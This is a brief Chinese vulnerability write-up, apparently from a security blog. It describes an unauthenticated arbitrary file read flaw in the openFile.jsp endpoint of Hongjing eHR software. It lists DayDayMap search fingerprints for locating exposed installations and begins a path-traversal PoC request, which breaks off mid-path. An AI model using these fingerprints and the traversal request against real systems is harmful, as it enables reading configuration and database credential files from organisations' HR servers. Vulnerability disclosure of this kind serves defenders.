0x01 产品简介
宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。
0x02 漏洞概述
宏景eHR openFile.jsp 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x03 复现环境
DayDayMap:
body="<div class=\"hj-hy-all-one-logo\""||title="人力资源信息管理系统"||body="/general/sys/hjaxmanage.js"
0x04 漏洞复现
PoC
POST /templates/attestation/../../general/muster/hmuster/open